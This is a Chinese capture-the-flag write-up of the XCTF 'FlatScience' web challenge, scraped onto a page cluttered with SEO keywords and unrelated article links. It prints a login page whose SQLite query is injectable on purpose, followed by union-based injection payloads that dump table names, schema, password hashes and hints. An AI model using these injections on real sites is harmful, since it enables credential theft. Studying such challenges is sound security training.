当前位置: 首页 > news >正文

wordpress网站顶部网站抓取诊断

wordpress网站顶部,网站抓取诊断,网站开发技术服务费,廊坊开发区规划建设局网站攻防世界38-FlatScience-Web 点开这个here看到一堆pdf,感觉没用&#xff0c;扫描一下 试试弱口令先 源码里有&#xff1a; 好吧0.0 试试存不存在sql注入 根本没回显&#xff0c;转战login.php先 输入1’,发现sql注入 看到提示 访问后得源码 <?php ob_start(); ?>…

攻防世界38-FlatScience-Web

点开这个here看到一堆pdf,感觉没用,扫描一下

image-20241112213147892

试试弱口令先

image-20241112213254645

源码里有:

好吧0.0

试试存不存在sql注入

根本没回显,转战login.php先

输入1’,发现sql注入

image-20241112215625192

image-20241112215405748

看到提示

访问后得源码

<?php
ob_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"><html>
<head>
<style>
blockquote { background: #eeeeee; }
h1 { border-bottom: solid black 2px; }
h2 { border-bottom: solid black 1px; }
.comment { color: darkgreen; }
</style><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Login</title>
</head>
<body><div align=right class=lastmod>
Last Modified: Fri Mar  31:33:7 UTC 1337
</div><h1>Login</h1>Login Page, do not try to hax here plox!<br><form method="post">ID:<br><input type="text" name="usr"><br>Password:<br> <input type="text" name="pw"><br><br><input type="submit" value="Submit">
</form><?php
if(isset($_POST['usr']) && isset($_POST['pw'])){$user = $_POST['usr'];$pass = $_POST['pw'];$db = new SQLite3('../fancy.db');$res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");if($res){$row = $res->fetchArray();}else{echo "<br>Some Error occourred!";}if(isset($row['id'])){setcookie('name',' '.$row['name'], time() + 60, '/');header("Location: /");die();}}if(isset($_GET['debug']))
highlight_file('login.php');
?>
<!-- TODO: Remove ?debug-Parameter! --><hr noshade>
<address>Flux Horst (Flux dot Horst at rub dot flux)</address>
</body>

​ $db = new SQLite3(‘…/fancy.db’);提示是个sqlite注入

payload里注入

image-20241112221500703

返回在右上角

image-20241112221652101

usr=' union select 1,group_concat(tbl_name) from sqlite_master where type='table'--&pw= //查所有表
usr=' union select 1,group_concat(sql) from sqlite_master where tbl_name='Users'--&pw= //查表所有字段
//查所有内容
usr=' union select 1,group_concat(id) from Users--&pw=1
usr=' union select 1,group_concat(name) from Users--&pw=1
usr=' union select 1,group_concat(password) from Users--&pw=1
usr=' union select 1,group_concat(hint) from Users--&pw=

得到hint,下面做不动了

贴一个大佬的wp

oncat(password) from Users–&pw=1
usr=’ union select 1,group_concat(hint) from Users–&pw=


得到hint,下面做不动了贴一个大佬的wp[FlatScience XCTF web进阶区FlatScience详解-CSDN博客](https://blog.csdn.net/weixin_43693550/article/details/120241607?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-2-120241607-blog-112161044.235^v43^pc_blog_bottom_relevance_base4&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromBaidu~Rate-2-120241607-blog-112161044.235^v43^pc_blog_bottom_relevance_base4&utm_relevant_index=5)
http://www.yayakq.cn/news/673742/

相关文章:

  • 网站建设那家做的好天河网站建设方案
  • 手机网站域名设置做的网站很卡是什么原因
  • 企业网站建设既可以外包给专业的网站建设服务公司做网站最简单
  • 网站绑定ftpwordpress长文分页
  • 天津建设银行东丽网站电商行业网站建设及维护
  • 南宁seo网站推广服务大连黄页企业名录
  • 私人网站如何建杭州旅游网站建设
  • 网站制作完成之后wordpress视频优化
  • WordPress开网站很慢抖音代运营是干嘛的
  • 湘潭网站建设 多少费用磐石网络wordpress 登录集成
  • 无锡网站建设网站南昌it制作电商网站的公司
  • wordpress站点主页浦东新区手机网站设计
  • 军事最新消息新闻app排名优化公司
  • 常州企业自助建站系统潍坊优化公司
  • 做兼职用什么网站最好网站前端需要会什么
  • html期末大作业个人网站制作dremrever做网站流程
  • 上海先进网站建设公司制作书签样式
  • 建设网站如何盈利制作图片视频软件app
  • 织梦做分类信息系统网站网站前端设计与实现
  • 响应式网站内容布局金融网站建设方案书
  • 谷歌seo网站建设wordpress 示例页面 删除
  • 网站备案 接入商h5模板在线设计
  • 网站权限分配代码推广优化关键词
  • 网站建设柒金手指排名二一装修网线用几类
  • 阳泉移动网站建设管理人员需要培训哪些课程
  • 淮安市建设局网站首页qq小程序api
  • 外语人才网官网嘉兴网站推广优化公司
  • 使用亚马逊云做网站wordpress添加说说
  • 建站标准英文网站如何做seo
  • 白酒网站设计黄村网站建设公司